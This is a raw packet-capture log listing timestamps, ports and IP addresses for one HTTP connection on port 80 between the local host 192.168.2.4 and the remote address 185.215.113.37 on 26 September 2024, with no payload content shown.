Sep 26, 2024 00:39:11.111542940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111542940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111553907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111565113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111571074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111581087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111592054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111602068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111608028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111608028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111612082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111624002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111630917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111634970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111644030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111660004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111660957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111660957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111675978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111686945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111697912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111706972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111709118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111709118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111717939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111728907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111737967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111740112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111748934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111758947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111772060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111778975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111779928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111779928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111790895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111802101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111812115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111812115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111824036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111833096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111841917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111844063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111855030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111865044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111874104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111882925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111885071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111885071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111895084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111905098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111915112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111929893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111938000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111938000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.111943007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111953020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.111962080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.112010002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234131098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234157085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234169006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234180927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234190941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234201908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234213114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234224081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234323025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234385967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234474897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234500885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234513998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234538078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234549046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234550953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234561920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234569073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234572887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234586954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234596968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234607935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234622002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234627008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234627008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234633923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234651089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234652996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234663963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234666109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234678984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234688997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234699965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234708071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234709024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234714031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234745026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234751940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234762907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234772921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234782934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234786034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234822035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234836102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234852076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234863043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234873056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234883070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234900951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234911919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234916925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234925985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234941959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.234942913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.234967947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235018015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235035896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235048056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235058069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235068083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235078096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235088110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235091925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235099077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235110998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235116959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235124111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235133886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235147953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235158920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235160112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235158920 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235182047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235189915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235200882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235212088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235232115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235232115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235261917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235290051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235301018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235310078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235321045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235330105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235342026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235353947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235357046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235357046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235395908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235395908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235439062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235450983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235460997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235471964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235481977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235492945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235502005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235503912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235503912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235515118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235559940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235559940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235585928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235598087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235606909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235619068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235630035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235649109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235649109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235661983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235672951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235682964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235693932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235702991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.235708952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235708952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235735893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.235785961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.275847912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.280775070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496140003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496160030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496172905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496212959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496225119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496236086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496247053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496258974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496259928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496270895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496296883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496296883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496330023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496347904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496360064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496370077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496382952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496393919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496431112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496444941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496633053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496644020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496659994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496670961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496680021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496691942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496704102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496706009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496706009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496714115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496725082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496733904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496746063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496753931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496753931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496756077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496767998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496778011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496792078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496803999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496813059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496822119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496833086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496839046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496839046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496845007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496857882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496867895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496880054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496889114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496889114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496918917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.496948004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496958971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496968985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496980906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.496982098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497023106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497030020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497041941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497051001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497076988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497077942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497088909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497100115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497109890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497119904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497122049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497122049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497133017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497140884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497176886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497176886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497204065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497215033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497224092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497235060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497256994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497291088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497291088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497296095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497308016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497318029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497328997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497334957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497368097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497397900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497410059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497410059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497423887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497435093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497446060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497454882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497457981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497457981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497503996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497523069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497534990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497544050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497554064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497565031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497575045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497591019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497591019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497663975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497667074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497678995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497689009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497699022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497709036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497718096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497720003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497733116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497742891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497752905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497756958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497762918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497802019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497817993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497828007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497838974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497848988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497859001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497869015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497879028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497889996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497890949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497890949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497900963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.497935057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.497935057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.587058067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.587147951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.587186098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.587407112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620141983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620162010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620181084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620191097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620202065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620213985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620232105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620243073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620254993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620279074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620384932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620394945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620414019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620425940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620434999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620449066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:11.620450020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620450020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620450020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:11.620495081 CEST	49730	80	192.168.2.4	185.215.113.37
